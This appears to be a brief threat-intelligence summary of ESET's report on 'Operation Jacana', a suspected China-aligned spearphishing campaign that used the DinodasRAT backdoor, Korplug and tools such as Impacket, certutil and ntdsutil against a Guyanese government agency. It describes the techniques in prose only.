Espionage Campaign 'Operation Jacana' Targets Guyana Government Agency

Category: Threat Actor Activity | Industry: Government | Source: ESET

An espionage campaign targeting a government agency in Guyana dubbed "Operation Jacana," is reported by ESET researcher, Fernando Tavella. The campaign is reported to have been identified in February 2023 through a spearphishing email that lured the target using recent geopolitical events. While not definitively attributed to a specific APT group, ESET assesses with medium confidence that a China-aligned threat actor is responsible for this operation. Of the malware distributed in the campaign, a variant of Korplug/PlugX was discovered aiding the attribution to a China-aligned threat actor. Tavella points out there is an economic interest for China in Guyana, driven by the Belt and Road Initiative — a global infrastructure development project launched by China aimed to foster economic partnerships and connectivity across various countries.

Spearphishing emails with subjects related to Guyanese public affairs were used to lure victims, with links leading to a ZIP file hosted on a Vietnamese governmental website. Once the victim extracted and launched the ZIP file, containing an executable for a new C++ backdoor tracked as "DinodasRAT," infected the victim's system. Name based on its command & control (C2) configuration string "always begins with Din." This multifaceted malware can exfiltrate files, capture screenshots, manipulate the Windows registry, execute commands, and more.

After the initial compromise, the threat actors executed lateral movement within the victim's network using tools like Impacket. They employed various commands, including certutil to download files, create persistence with a new account, and extract credentials using ntdsutil.exe. DinodasRAT, with its unique capabilities, played a central role in the espionage campaign, enabling the attackers to remain stealthy in their operations along with the use of additional malware in Korplug and a SoftEther VPN client. While lateral movement and malware along with C2 activity were reported, the level of impact of the Operation Jacana campaign is unknown and whether attackers were able to exfiltrate data from the compromised government entity.